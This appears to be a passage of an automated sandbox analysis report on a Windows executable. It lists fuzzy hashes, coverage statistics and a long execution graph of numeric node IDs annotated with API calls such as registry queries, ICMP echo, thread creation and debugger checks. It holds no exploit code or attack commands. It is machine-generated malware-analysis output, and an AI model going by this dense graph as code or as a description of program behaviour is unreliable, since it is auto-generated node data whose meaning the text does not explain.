                                                          • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                          • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                          Execution Graph

                                                          Execution Coverage:4.1%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:2.8%
                                                          Total number of Nodes:2000
                                                          Total number of Limit Nodes:189
                                                          execution_graph 100559 251055 100564 252a19 100559->100564 100562 272f70 __cinit 67 API calls 100563 251064 100562->100563 100565 261207 59 API calls 100564->100565 100566 252a87 100565->100566 100571 251256 100566->100571 100569 252b24 100570 25105a 100569->100570 100574 2513f8 59 API calls 2 library calls 100569->100574 100570->100562 100575 251284 100571->100575 100574->100569 100576 251291 100575->100576 100577 251275 100575->100577 100576->100577 100578 251298 RegOpenKeyExW 100576->100578 100577->100569 100578->100577 100579 2512b2 RegQueryValueExW 100578->100579 100580 2512d3 100579->100580 100581 2512e8 RegCloseKey 100579->100581 100580->100581 100581->100577 100582 255ff5 100606 255ede Mailbox _memmove 100582->100606 100583 270fe6 59 API calls Mailbox 100583->100606 100584 256a9b 100788 25a9de 298 API calls 100584->100788 100585 2553b0 298 API calls 100585->100606 100587 28eff9 100800 255190 59 API calls Mailbox 100587->100800 100589 28f007 100801 2ba48d 89 API calls 4 library calls 100589->100801 100591 28efeb 100639 255569 Mailbox 100591->100639 100799 2a6cf1 59 API calls Mailbox 100591->100799 100594 2560e5 100595 28e137 100594->100595 100598 2563bd Mailbox 100594->100598 100610 256abc 100594->100610 100626 256152 Mailbox 100594->100626 100595->100598 100789 2a7aad 59 API calls 100595->100789 100596 261c9c 59 API calls 100596->100606 100599 270fe6 Mailbox 59 API calls 100598->100599 100612 256426 100598->100612 100603 2563d1 100599->100603 100602 261a36 59 API calls 100602->100606 100605 2563de 100603->100605 100603->100610 100604 2cc355 298 API calls 100604->100606 100607 256413 100605->100607 100608 28e172 100605->100608 100606->100583 100606->100584 100606->100585 100606->100587 100606->100589 100606->100594 100606->100596 100606->100602 100606->100604 100606->100610 100606->100639 100787 25523c 59 API calls 100606->100787 100792 2b7f11 59 API calls Mailbox 100606->100792 100793 2a6cf1 59 API calls Mailbox 100606->100793 100607->100612 100640 255447 Mailbox 100607->100640 100790 2cc87c 85 API calls 2 library calls 100608->100790 100798 2ba48d 89 API calls 4 library calls 100610->100798 100791 2cc9c9 95 API calls Mailbox 100612->100791 100615 28e19d 100615->100615 100616 28e691 100795 2ba48d 89 API calls 4 library calls 100616->100795 100617 28f165 100803 2ba48d 89 API calls 4 library calls 100617->100803 100621 270fe6 59 API calls Mailbox 100621->100640 100623 2569fa 100629 261c9c 59 API calls 100623->100629 100624 28e6a0 100625 261c9c 59 API calls 100625->100640 100626->100591 100626->100610 100628 28e2e9 VariantClear 100626->100628 100626->100639 100644 2ce60c 130 API calls 100626->100644 100647 2b412a 3 API calls 100626->100647 100651 2cf1b2 91 API calls 100626->100651 100652 2c5e1d 100626->100652 100677 2b413a 100626->100677 100680 2bd6be 100626->100680 100725 25cfd7 100626->100725 100744 25d679 100626->100744 100786 255190 59 API calls Mailbox 100626->100786 100794 2a7aad 59 API calls 100626->100794 100627 2569ff 100627->100616 100627->100617 100628->100626 100629->100639 100631 28ea9a 100634 261c9c 59 API calls 100631->100634 100632 261207 59 API calls 100632->100640 100634->100639 100635 28eb67 100635->100639 100796 2a7aad 59 API calls 100635->100796 100636 2a7aad 59 API calls 100636->100640 100637 272f70 67 API calls __cinit 100637->100640 100640->100616 100640->100621 100640->100623 100640->100625 100640->100627 100640->100631 100640->100632 100640->100635 100640->100636 100640->100637 100640->100639 100641 28ef28 100640->100641 100643 255a1a 100640->100643 100784 257e50 298 API calls 2 library calls 100640->100784 100785 256e30 60 API calls Mailbox 100640->100785 100797 2ba48d 89 API calls 4 library calls 100641->100797 100802 2ba48d 89 API calls 4 library calls 100643->100802 100644->100626 100647->100626 100651->100626 100653 2c5e46 100652->100653 100654 2c5e74 WSAStartup 100653->100654 100655 25502b 59 API calls 100653->100655 100656 2c5e9d 100654->100656 100676 2c5e88 Mailbox 100654->100676 100658 2c5e61 100655->100658 100657 2640cd 59 API calls 100656->100657 100659 2c5ea6 100657->100659 100658->100654 100661 25502b 59 API calls 100658->100661 100660 254d37 84 API calls 100659->100660 100662 2c5eb2 100660->100662 100663 2c5e70 100661->100663 100664 26402a 61 API calls 100662->100664 100663->100654 100665 2c5ebf inet_addr gethostbyname 100664->100665 100666 2c5edd IcmpCreateFile 100665->100666 100665->100676 100667 2c5f01 100666->100667 100666->100676 100668 270fe6 Mailbox 59 API calls 100667->100668 100669 2c5f1a 100668->100669 100670 26433f 59 API calls 100669->100670 100671 2c5f25 100670->100671 100672 2c5f34 IcmpSendEcho 100671->100672 100673 2c5f55 IcmpSendEcho 100671->100673 100674 2c5f6d 100672->100674 100673->100674 100675 2c5fd4 IcmpCloseHandle WSACleanup 100674->100675 100675->100676 100676->100626 100678 2b494a 3 API calls 100677->100678 100679 2b413f 100678->100679 100679->100626 100681 2bd6e8 100680->100681 100682 2bd6dd 100680->100682 100685 261207 59 API calls 100681->100685 100721 2bd7c2 Mailbox 100681->100721 100683 25502b 59 API calls 100682->100683 100683->100681 100684 270fe6 Mailbox 59 API calls 100686 2bd80b 100684->100686 100687 2bd70c 100685->100687 100688 2bd817 100686->100688 100804 263df7 60 API calls Mailbox 100686->100804 100690 261207 59 API calls 100687->100690 100691 254d37 84 API calls 100688->100691 100692 2bd715 100690->100692 100693 2bd82f 100691->100693 100694 254d37 84 API calls 100692->100694 100695 263e47 67 API calls 100693->100695 100696 2bd721 100694->100696 100697 2bd83e 100695->100697 100698 270119 59 API calls 100696->100698 100699 2bd842 GetLastError 100697->100699 100700 2bd876 100697->100700 100701 2bd736 100698->100701 100702 2bd85b 100699->100702 100704 2bd8d8 100700->100704 100705 2bd8a1 100700->100705 100703 2617e0 59 API calls 100701->100703 100722 2bd7cb Mailbox 100702->100722 100805 263f0b CloseHandle 100702->100805 100706 2bd769 100703->100706 100707 270fe6 Mailbox 59 API calls 100704->100707 100708 270fe6 Mailbox 59 API calls 100705->100708 100713 2b412a 3 API calls 100706->100713 100724 2bd793 Mailbox 100706->100724 100709 2bd8dd 100707->100709 100710 2bd8a6 100708->100710 100716 261207 59 API calls 100709->100716 100709->100722 100714 2bd8b7 100710->100714 100717 261207 59 API calls 100710->100717 100712 25502b 59 API calls 100712->100721 100715 2bd779 100713->100715 100806 2bfc0d 59 API calls 2 library calls 100714->100806 100718 261a36 59 API calls 100715->100718 100715->100724 100716->100722 100717->100714 100720 2bd78a 100718->100720 100723 2b3f1d 63 API calls 100720->100723 100721->100684 100721->100722 100722->100626 100723->100724 100724->100712 100726 254d37 84 API calls 100725->100726 100727 25d001 100726->100727 100728 255278 59 API calls 100727->100728 100729 25d018 100728->100729 100730 25d57b 100729->100730 100731 25502b 59 API calls 100729->100731 100740 25d439 Mailbox __wsetenvp 100729->100740 100730->100626 100731->100740 100732 27312d _W_store_winword 60 API calls 100732->100740 100733 26162d 59 API calls 100733->100740 100734 254f98 59 API calls 100734->100740 100736 270c65 62 API calls 100736->100740 100738 25502b 59 API calls 100738->100740 100739 254d37 84 API calls 100739->100740 100740->100730 100740->100732 100740->100733 100740->100734 100740->100736 100740->100738 100740->100739 100741 261821 59 API calls 100740->100741 100742 2659d3 94 API calls 100740->100742 100743 265ac3 Shell_NotifyIconW 100740->100743 100807 26153b 59 API calls 2 library calls 100740->100807 100808 254f3c 59 API calls Mailbox 100740->100808 100741->100740 100742->100740 100743->100740 100809 254f98 100744->100809 100747 270fe6 Mailbox 59 API calls 100749 25d6aa 100747->100749 100752 25d6ba 100749->100752 100836 263df7 60 API calls Mailbox 100749->100836 100750 295068 100751 25d6df 100750->100751 100841 2bfbb7 59 API calls 100750->100841 100755 25502b 59 API calls 100751->100755 100760 25d6ec 100751->100760 100754 254d37 84 API calls 100752->100754 100756 25d6c8 100754->100756 100757 2950b0 100755->100757 100758 263e47 67 API calls 100756->100758 100759 2950b8 100757->100759 100757->100760 100761 25d6d7 100758->100761 100762 25502b 59 API calls 100759->100762 100822 2641d6 100760->100822 100761->100750 100761->100751 100840 263f0b CloseHandle 100761->100840 100765 25d6f3 100762->100765 100766 2950ca 100765->100766 100767 25d70d 100765->100767 100769 270fe6 Mailbox 59 API calls 100766->100769 100768 261207 59 API calls 100767->100768 100770 25d715 100768->100770 100771 2950d0 100769->100771 100837 263b7b 65 API calls Mailbox 100770->100837 100773 2950e4 100771->100773 100776 263ea1 2 API calls 100771->100776 100778 2950e8 _memmove 100773->100778 100827 2b7c7f 100773->100827 100775 25d724 100775->100778 100838 254f3c 59 API calls Mailbox 100775->100838 100776->100773 100779 25d738 Mailbox 100780 25d772 100779->100780 100781 2642cf CloseHandle 100779->100781 100780->100626 100782 25d766 100781->100782 100782->100780 100839 263f0b CloseHandle 100782->100839 100784->100640 100785->100640 100786->100626 100787->100606 100788->100610 100789->100598 100790->100612 100791->100615 100792->100606 100793->100606 100794->100626 100795->100624 100796->100639 100797->100643 100798->100591 100799->100639 100800->100591 100801->100591 100802->100639 100803->100639 100804->100688 100805->100722 100806->100722 100807->100740 100808->100740 100810 28dd2b 100809->100810 100811 254fa8 100809->100811 100812 28dd3c 100810->100812 100814 261821 59 API calls 100810->100814 100816 270fe6 Mailbox 59 API calls 100811->100816 100813 2619e1 59 API calls 100812->100813 100815 28dd46 100813->100815 100814->100812 100819 254fd4 100815->100819 100820 261207 59 API calls 100815->100820 100817 254fbb 100816->100817 100817->100815 100818 254fc6 100817->100818 100818->100819 100821 261a36 59 API calls 100818->100821 100819->100747 100819->100750 100820->100819 100821->100819 100823 26410a 2 API calls 100822->100823 100824 2641f7 100823->100824 100825 26410a 2 API calls 100824->100825 100826 26420b 100825->100826 100826->100765 100828 2b7c8a 100827->100828 100829 270fe6 Mailbox 59 API calls 100828->100829 100830 2b7c91 100829->100830 100831 2b7cbe 100830->100831 100832 2b7c9d 100830->100832 100834 270fe6 Mailbox 59 API calls 100831->100834 100833 270fe6 Mailbox 59 API calls 100832->100833 100835 2b7ca6 _memset 100833->100835 100834->100835 100835->100778 100836->100752 100837->100775 100838->100779 100839->100780 100840->100750 100841->100750 100842 2901f8 100843 2901fa 100842->100843 100846 2b4d18 SHGetFolderPathW 100843->100846 100847 261821 59 API calls 100846->100847 100848 290203 100847->100848 97762 251066 97767 25aaaa 97762->97767 97764 25106c 97800 272f70 97764->97800 97768 25aacb 97767->97768 97803 2702eb 97768->97803 97772 25ab12 97813 261207 97772->97813 97775 261207 59 API calls 97776 25ab26 97775->97776 97777 261207 59 API calls 97776->97777 97778 25ab30 97777->97778 97779 261207 59 API calls 97778->97779 97780 25ab6e 97779->97780 97781 261207 59 API calls 97780->97781 97782 25ac39 97781->97782 97818 270588 97782->97818 97786 25ac6b 97787 261207 59 API calls 97786->97787 97788 25ac75 97787->97788 97846 26fe2b 97788->97846 97790 25acbc 97791 25accc GetStdHandle 97790->97791 97792 292f39 97791->97792 97793 25ad18 97791->97793 97792->97793 97795 292f42 97792->97795 97794 25ad20 OleInitialize 97793->97794 97794->97764 97853 2b70f3 64 API calls Mailbox 97795->97853 97797 292f49 97854 2b77c2 CreateThread 97797->97854 97799 292f55 CloseHandle 97799->97794 97926 272e74 97800->97926 97802 251076 97855 2703c4 97803->97855 97806 2703c4 59 API calls 97807 27032d 97806->97807 97808 261207 59 API calls 97807->97808 97809 270339 97808->97809 97862 261821 97809->97862 97811 25aad1 97812 2707bb 6 API calls 97811->97812 97812->97772 97814 270fe6 Mailbox 59 API calls 97813->97814 97815 261228 97814->97815 97816 270fe6 Mailbox 59 API calls 97815->97816 97817 25ab1c 97816->97817 97817->97775 97819 261207 59 API calls 97818->97819 97820 270598 97819->97820 97821 261207 59 API calls 97820->97821 97822 2705a0 97821->97822 97921 2610c3 97822->97921 97825 2610c3 59 API calls 97826 2705b0 97825->97826 97827 261207 59 API calls 97826->97827 97828 2705bb 97827->97828 97829 270fe6 Mailbox 59 API calls 97828->97829 97830 25ac43 97829->97830 97831 26ff4c 97830->97831 97832 26ff5a 97831->97832 97833 261207 59 API calls 97832->97833 97834 26ff65 97833->97834 97835 261207 59 API calls 97834->97835 97836 26ff70 97835->97836 97837 261207 59 API calls 97836->97837 97838 26ff7b 97837->97838 97839 261207 59 API calls 97838->97839 97840 26ff86 97839->97840 97841 2610c3 59 API calls 97840->97841 97842 26ff91 97841->97842 97843 270fe6 Mailbox 59 API calls 97842->97843 97844 26ff98 RegisterWindowMessageW 97843->97844 97844->97786 97847 2a620c 97846->97847 97848 26fe3b 97846->97848 97924 2ba12a 59 API calls 97847->97924 97849 270fe6 Mailbox 59 API calls 97848->97849 97852 26fe43 97849->97852 97851 2a6217 97852->97790 97853->97797 97854->97799 97925 2b77a8 65 API calls 97854->97925 97856 261207 59 API calls 97855->97856 97857 2703cf 97856->97857 97858 261207 59 API calls 97857->97858 97859 2703d7 97858->97859 97860 261207 59 API calls 97859->97860 97861 270323 97860->97861 97861->97806 97863 26182d __wsetenvp 97862->97863 97864 26189a 97862->97864 97867 261843 97863->97867 97868 261868 97863->97868 97875 261981 97864->97875 97866 26184b _memmove 97866->97811 97871 261b7c 59 API calls Mailbox 97867->97871 97872 261c7e 97868->97872 97871->97866 97879 270fe6 97872->97879 97874 261c88 97874->97866 97876 26198f 97875->97876 97878 261998 _memmove 97875->97878 97876->97878 97917 261aa4 97876->97917 97878->97866 97881 270fee 97879->97881 97882 271008 97881->97882 97884 27100c std::exception::exception 97881->97884 97889 27593c 97881->97889 97906 2735d1 DecodePointer 97881->97906 97882->97874 97907 2787cb RaiseException 97884->97907 97886 271036 97908 278701 58 API calls _free 97886->97908 97888 271048 97888->97874 97890 2759b7 97889->97890 97897 275948 97889->97897 97915 2735d1 DecodePointer 97890->97915 97892 2759bd 97916 278d58 58 API calls __getptd_noexit 97892->97916 97895 27597b RtlAllocateHeap 97895->97897 97905 2759af 97895->97905 97897->97895 97898 2759a3 97897->97898 97899 275953 97897->97899 97903 2759a1 97897->97903 97912 2735d1 DecodePointer 97897->97912 97913 278d58 58 API calls __getptd_noexit 97898->97913 97899->97897 97909 27a39b 58 API calls __NMSG_WRITE 97899->97909 97910 27a3f8 58 API calls 6 library calls 97899->97910 97911 2732cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97899->97911 97914 278d58 58 API calls __getptd_noexit 97903->97914 97905->97881 97906->97881 97907->97886 97908->97888 97909->97899 97910->97899 97912->97897 97913->97903 97914->97905 97915->97892 97916->97905 97918 261ab7 97917->97918 97920 261ab4 _memmove 97917->97920 97919 270fe6 Mailbox 59 API calls 97918->97919 97919->97920 97920->97878 97922 261207 59 API calls 97921->97922 97923 2610cb 97922->97923 97923->97825 97924->97851 97927 272e80 __ioinit 97926->97927 97934 273447 97927->97934 97933 272ea7 __ioinit 97933->97802 97951 279e3b 97934->97951 97936 272e89 97937 272eb8 DecodePointer DecodePointer 97936->97937 97938 272e95 97937->97938 97939 272ee5 97937->97939 97948 272eb2 97938->97948 97939->97938 97997 2789d4 59 API calls __cftof2_l 97939->97997 97941 272f48 EncodePointer EncodePointer 97941->97938 97942 272ef7 97942->97941 97943 272f1c 97942->97943 97998 278a94 61 API calls 2 library calls 97942->97998 97943->97938 97946 272f36 EncodePointer 97943->97946 97999 278a94 61 API calls 2 library calls 97943->97999 97946->97941 97947 272f30 97947->97938 97947->97946 98000 273450 97948->98000 97952 279e5f EnterCriticalSection 97951->97952 97953 279e4c 97951->97953 97952->97936 97958 279ec3 97953->97958 97955 279e52 97955->97952 97982 2732e5 58 API calls 3 library calls 97955->97982 97959 279ecf __ioinit 97958->97959 97960 279ef0 97959->97960 97961 279ed8 97959->97961 97970 279f11 __ioinit 97960->97970 97986 278a4d 58 API calls 2 library calls 97960->97986 97983 27a39b 58 API calls __NMSG_WRITE 97961->97983 97963 279edd 97984 27a3f8 58 API calls 6 library calls 97963->97984 97966 279f05 97968 279f0c 97966->97968 97969 279f1b 97966->97969 97967 279ee4 97985 2732cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97967->97985 97987 278d58 58 API calls __getptd_noexit 97968->97987 97971 279e3b __lock 58 API calls 97969->97971 97970->97955 97974 279f22 97971->97974 97976 279f47 97974->97976 97977 279f2f 97974->97977 97989 272f85 97976->97989 97988 27a05b InitializeCriticalSectionAndSpinCount 97977->97988 97980 279f3b 97995 279f63 LeaveCriticalSection _doexit 97980->97995 97983->97963 97984->97967 97986->97966 97987->97970 97988->97980 97990 272f8e RtlFreeHeap 97989->97990 97991 272fb7 __dosmaperr 97989->97991 97990->97991 97992 272fa3 97990->97992 97991->97980 97996 278d58 58 API calls __getptd_noexit 97992->97996 97994 272fa9 GetLastError 97994->97991 97995->97970 97996->97994 97997->97942 97998->97943 97999->97947 98003 279fa5 LeaveCriticalSection 98000->98003 98002 272eb7 98002->97933 98003->98002 100849 251016 100854 265ce7 100849->100854 100852 272f70 __cinit 67 API calls 100853 251025 100852->100853 100855 270fe6 Mailbox 59 API calls 100854->100855 100856 265cef 100855->100856 100858 25101b 100856->100858 100861 265f39 100856->100861 100858->100852 100862 265cfb 100861->100862 100863 265f42 100861->100863 100865 265d13 100862->100865 100864 272f70 __cinit 67 API calls 100863->100864 100864->100862 100866 261207 59 API calls 100865->100866 100867 265d2b GetVersionExW 100866->100867 100868 261821 59 API calls 100867->100868 100869 265d6e 100868->100869 100870 261981 59 API calls 100869->100870 100875 265d9b 100869->100875 100871 265d8f 100870->100871 100872 26133d 59 API calls 100871->100872 100872->100875 100873 265e00 GetCurrentProcess IsWow64Process 100874 265e19 100873->100874 100877 265e2f 100874->100877 100878 265e98 GetSystemInfo 100874->100878 100875->100873 100876 2a1098 100875->100876 100889 2655f0 100877->100889 100879 265e65 100878->100879 100879->100858 100882 265e41 100885 2655f0 2 API calls 100882->100885 100883 265e8c GetSystemInfo 100884 265e56 100883->100884 100884->100879 100886 265e5c FreeLibrary 100884->100886 100887 265e49 GetNativeSystemInfo 100885->100887 100886->100879 100887->100884 100890 265619 100889->100890 100891 2655f9 LoadLibraryA 100889->100891 100890->100882 100890->100883 100891->100890 100892 26560a GetProcAddress 100891->100892 100892->100890 98004 277e83 98005 277e8f __ioinit 98004->98005 98041 27a038 GetStartupInfoW 98005->98041 98007 277e94 98043 278dac GetProcessHeap 98007->98043 98009 277eec 98010 277ef7 98009->98010 98126 277fd3 58 API calls 3 library calls 98009->98126 98044 279d16 98010->98044 98013 277efd 98014 277f08 __RTC_Initialize 98013->98014 98127 277fd3 58 API calls 3 library calls 98013->98127 98065 27d802 98014->98065 98017 277f17 98018 277f23 GetCommandLineW 98017->98018 98128 277fd3 58 API calls 3 library calls 98017->98128 98084 285153 GetEnvironmentStringsW 98018->98084 98022 277f22 98022->98018 98024 277f3d 98025 277f48 98024->98025 98129 2732e5 58 API calls 3 library calls 98024->98129 98094 284f88 98025->98094 98028 277f4e 98029 277f59 98028->98029 98130 2732e5 58 API calls 3 library calls 98028->98130 98108 27331f 98029->98108 98032 277f61 98033 277f6c __wwincmdln 98032->98033 98131 2732e5 58 API calls 3 library calls 98032->98131 98114 265f8b 98033->98114 98036 277f80 98037 277f8f 98036->98037 98132 273588 58 API calls _doexit 98036->98132 98133 273310 58 API calls _doexit 98037->98133 98040 277f94 __ioinit 98042 27a04e 98041->98042 98042->98007 98043->98009 98134 2733b7 36 API calls 2 library calls 98044->98134 98046 279d1b 98135 279f6c InitializeCriticalSectionAndSpinCount __ioinit 98046->98135 98048 279d20 98049 279d24 98048->98049 98137 279fba TlsAlloc 98048->98137 98136 279d8c 61 API calls 2 library calls 98049->98136 98052 279d29 98052->98013 98053 279d36 98053->98049 98054 279d41 98053->98054 98138 278a05 98054->98138 98057 279d83 98146 279d8c 61 API calls 2 library calls 98057->98146 98060 279d88 98060->98013 98061 279d62 98061->98057 98062 279d68 98061->98062 98145 279c63 58 API calls 4 library calls 98062->98145 98064 279d70 GetCurrentThreadId 98064->98013 98066 27d80e __ioinit 98065->98066 98067 279e3b __lock 58 API calls 98066->98067 98068 27d815 98067->98068 98069 278a05 __calloc_crt 58 API calls 98068->98069 98071 27d826 98069->98071 98070 27d891 GetStartupInfoW 98078 27d8a6 98070->98078 98079 27d9d5 98070->98079 98071->98070 98072 27d831 __ioinit @_EH4_CallFilterFunc@8 98071->98072 98072->98017 98073 27da9d 98160 27daad LeaveCriticalSection _doexit 98073->98160 98075 278a05 __calloc_crt 58 API calls 98075->98078 98076 27da22 GetStdHandle 98076->98079 98077 27da35 GetFileType 98077->98079 98078->98075 98078->98079 98080 27d8f4 98078->98080 98079->98073 98079->98076 98079->98077 98159 27a05b InitializeCriticalSectionAndSpinCount 98079->98159 98080->98079 98081 27d928 GetFileType 98080->98081 98158 27a05b InitializeCriticalSectionAndSpinCount 98080->98158 98081->98080 98085 277f33 98084->98085 98086 285164 98084->98086 98090 284d4b GetModuleFileNameW 98085->98090 98161 278a4d 58 API calls 2 library calls 98086->98161 98088 2851a0 FreeEnvironmentStringsW 98088->98085 98089 28518a _memmove 98089->98088 98091 284d7f _wparse_cmdline 98090->98091 98093 284dbf _wparse_cmdline 98091->98093 98162 278a4d 58 API calls 2 library calls 98091->98162 98093->98024 98095 284fa1 __wsetenvp 98094->98095 98099 284f99 98094->98099 98096 278a05 __calloc_crt 58 API calls 98095->98096 98104 284fca __wsetenvp 98096->98104 98097 285021 98098 272f85 _free 58 API calls 98097->98098 98098->98099 98099->98028 98100 278a05 __calloc_crt 58 API calls 98100->98104 98101 285046 98103 272f85 _free 58 API calls 98101->98103 98103->98099 98104->98097 98104->98099 98104->98100 98104->98101 98105 28505d 98104->98105 98163 284837 58 API calls __cftof2_l 98104->98163 98164 278ff6 IsProcessorFeaturePresent 98105->98164 98107 285069 98107->98028 98109 27332b __IsNonwritableInCurrentImage 98108->98109 98187 27a701 98109->98187 98111 273349 __initterm_e 98112 272f70 __cinit 67 API calls 98111->98112 98113 273368 _doexit __IsNonwritableInCurrentImage 98111->98113 98112->98113 98113->98032 98115 265fa5 98114->98115 98125 266044 98114->98125 98116 265fdf IsThemeActive 98115->98116 98190 27359c 98116->98190 98120 26600b 98202 265f00 SystemParametersInfoW SystemParametersInfoW 98120->98202 98122 266017 98203 265240 98122->98203 98124 26601f SystemParametersInfoW 98124->98125 98125->98036 98126->98010 98127->98014 98128->98022 98132->98037 98133->98040 98134->98046 98135->98048 98136->98052 98137->98053 98141 278a0c 98138->98141 98140 278a47 98140->98057 98144 27a016 TlsSetValue 98140->98144 98141->98140 98143 278a2a 98141->98143 98147 285426 98141->98147 98143->98140 98143->98141 98155 27a362 Sleep 98143->98155 98144->98061 98145->98064 98146->98060 98148 285431 98147->98148 98152 28544c 98147->98152 98149 28543d 98148->98149 98148->98152 98156 278d58 58 API calls __getptd_noexit 98149->98156 98150 28545c HeapAlloc 98150->98152 98153 285442 98150->98153 98152->98150 98152->98153 98157 2735d1 DecodePointer 98152->98157 98153->98141 98155->98143 98156->98153 98157->98152 98158->98080 98159->98079 98160->98072 98161->98089 98162->98093 98163->98104 98165 279001 98164->98165 98170 278e89 98165->98170 98169 27901c 98169->98107 98171 278ea3 _memset ___raise_securityfailure 98170->98171 98172 278ec3 IsDebuggerPresent 98171->98172 98178 27a385 SetUnhandledExceptionFilter UnhandledExceptionFilter 98172->98178 98175 278faa 98177 27a370 GetCurrentProcess TerminateProcess 98175->98177 98176 278f87 ___raise_securityfailure 98179 27c826 98176->98179 98177->98169 98178->98176 98180 27c830 IsProcessorFeaturePresent 98179->98180 98181 27c82e 98179->98181 98183 285b3a 98180->98183 98181->98175 98186 285ae9 5 API calls ___raise_securityfailure 98183->98186 98185 285c1d 98185->98175 98186->98185 98188 27a704 EncodePointer 98187->98188 98188->98188 98189 27a71e 98188->98189 98189->98111 98191 279e3b __lock 58 API calls 98190->98191 98192 2735a7 DecodePointer EncodePointer 98191->98192 98255 279fa5 LeaveCriticalSection 98192->98255 98194 266004 98195 273604 98194->98195 98196 27360e 98195->98196 98197 273628 98195->98197 98196->98197 98256 278d58 58 API calls __getptd_noexit 98196->98256 98197->98120 98199 273618 98257 278fe6 9 API calls __cftof2_l 98199->98257 98201 273623 98201->98120 98202->98122 98204 26524d __ftell_nolock 98203->98204 98205 261207 59 API calls 98204->98205 98206 265258 GetCurrentDirectoryW 98205->98206 98258 264ec8 98206->98258 98208 26527e IsDebuggerPresent 98209 26528c 98208->98209 98210 2a0b21 MessageBoxA 98208->98210 98211 2a0b39 98209->98211 98212 2652a0 98209->98212 98210->98211 98462 26314d 59 API calls Mailbox 98211->98462 98326 2631bf 98212->98326 98215 2a0b49 98223 2a0b5f SetCurrentDirectoryW 98215->98223 98217 2652be GetFullPathNameW 98219 261821 59 API calls 98217->98219 98218 26535f SetCurrentDirectoryW 98221 26536c Mailbox 98218->98221 98220 2652f9 98219->98220 98342 25bbc6 98220->98342 98221->98124 98223->98221 98225 265314 98226 26531e 98225->98226 98463 2b4f1c AllocateAndInitializeSid CheckTokenMembership FreeSid 98225->98463 98358 26514c GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 98226->98358 98229 2a0b7c 98229->98226 98232 2a0b8d 98229->98232 98464 2700cf 98232->98464 98233 265328 98235 26533d 98233->98235 98366 2659d3 98233->98366 98377 25bc70 98235->98377 98236 2a0b95 98471 261a36 98236->98471 98240 265348 98242 265358 98240->98242 98458 265ac3 98240->98458 98241 2a0ba2 98242->98218 98255->98194 98256->98199 98257->98201 98259 261207 59 API calls 98258->98259 98260 264ede 98259->98260 98491 265420 98260->98491 98262 264efc 98505 2619e1 98262->98505 98264 264f10 98509 261c9c 98264->98509 98269 261a36 59 API calls 98270 264f34 98269->98270 98516 2539be 98270->98516 98272 264f44 Mailbox 98273 261a36 59 API calls 98272->98273 98274 264f68 98273->98274 98275 2539be 68 API calls 98274->98275 98276 264f77 Mailbox 98275->98276 98277 261207 59 API calls 98276->98277 98278 264f94 98277->98278 98520 2655bc 98278->98520 98282 264fae 98283 2a0a54 98282->98283 98284 264fb8 98282->98284 98285 2655bc 59 API calls 98283->98285 98286 27312d _W_store_winword 60 API calls 98284->98286 98288 2a0a68 98285->98288 98287 264fc3 98286->98287 98287->98288 98289 264fcd 98287->98289 98290 2655bc 59 API calls 98288->98290 98291 27312d _W_store_winword 60 API calls 98289->98291 98292 2a0a84 98290->98292 98293 264fd8 98291->98293 98295 2700cf 61 API calls 98292->98295 98293->98292 98294 264fe2 98293->98294 98296 27312d _W_store_winword 60 API calls 98294->98296 98297 2a0aa7 98295->98297 98298 264fed 98296->98298 98299 2655bc 59 API calls 98297->98299 98300 264ff7 98298->98300 98301 2a0ad0 98298->98301 98302 2a0ab3 98299->98302 98303 26501b 98300->98303 98306 261c9c 59 API calls 98300->98306 98304 2655bc 59 API calls 98301->98304 98305 261c9c 59 API calls 98302->98305 98536 2547be 98303->98536 98307 2a0aee 98304->98307 98309 2a0ac1 98305->98309 98310 26500e 98306->98310 98308 261c9c 59 API calls 98307->98308 98312 2a0afc 98308->98312 98313 2655bc 59 API calls 98309->98313 98314 2655bc 59 API calls 98310->98314 98317 2655bc 59 API calls 98312->98317 98313->98301 98314->98303 98319 2a0b0b 98317->98319 98319->98319 98321 25477a 59 API calls 98323 265055 98321->98323 98322 2543d0 59 API calls 98322->98323 98323->98321 98323->98322 98324 2655bc 59 API calls 98323->98324 98325 26509b Mailbox 98323->98325 98324->98323 98325->98208 98327 2631cc __ftell_nolock 98326->98327 98328 2631e5 98327->98328 98329 2a0314 _memset 98327->98329 98607 270284 98328->98607 98331 2a0330 GetOpenFileNameW 98329->98331 98333 2a037f 98331->98333 98336 261821 59 API calls 98333->98336 98338 2a0394 98336->98338 98338->98338 98339 263203 98635 26278a 98339->98635 98343 25bbd3 __ftell_nolock 98342->98343 99573 262cb2 98343->99573 98345 25bbd8 98346 25bc52 98345->98346 99584 25c770 89 API calls 98345->99584 98346->98215 98346->98225 98348 25bbe5 98348->98346 99585 25f5a7 91 API calls Mailbox 98348->99585 98350 25bbee 98350->98346 98351 25bbf2 GetFullPathNameW 98350->98351 98352 261821 59 API calls 98351->98352 98353 25bc1e 98352->98353 98354 261821 59 API calls 98353->98354 98355 25bc2b 98354->98355 98356 293587 _wcscat 98355->98356 98357 261821 59 API calls 98355->98357 98357->98346 98359 2651b6 LoadImageW RegisterClassExW 98358->98359 98360 2a0b10 98358->98360 99588 253411 7 API calls 98359->99588 99589 265f5b LoadImageW EnumResourceNamesW 98360->99589 98363 26523a 98365 2650db CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98363->98365 98364 2a0b19 98365->98233 98367 2659fe _memset 98366->98367 99590 265800 98367->99590 98370 265a83 98372 265a9d Shell_NotifyIconW 98370->98372 98373 265ab9 Shell_NotifyIconW 98370->98373 98374 265aab 98372->98374 98373->98374 99594 2656f8 98374->99594 98378 29359f 98377->98378 98390 25bc95 98377->98390 99787 2ba48d 89 API calls 4 library calls 98378->99787 98380 25bf3b 98380->98240 98384 25c2b6 98384->98380 98385 25c2c3 98384->98385 99785 25c483 298 API calls Mailbox 98385->99785 98386 25bf25 Mailbox 98386->98380 99784 25c460 10 API calls Mailbox 98386->99784 98451 25bca5 Mailbox 98390->98451 99788 255376 60 API calls 98390->99788 99789 2a700c 298 API calls 98390->99789 98393 2936b3 Sleep 98393->98451 98395 29405d WaitForSingleObject 98398 29407d GetExitCodeProcess CloseHandle 98395->98398 98395->98451 98396 25bf54 timeGetTime 98396->98451 98406 25c36b 98398->98406 98399 25c210 Sleep 98434 25c1fa Mailbox 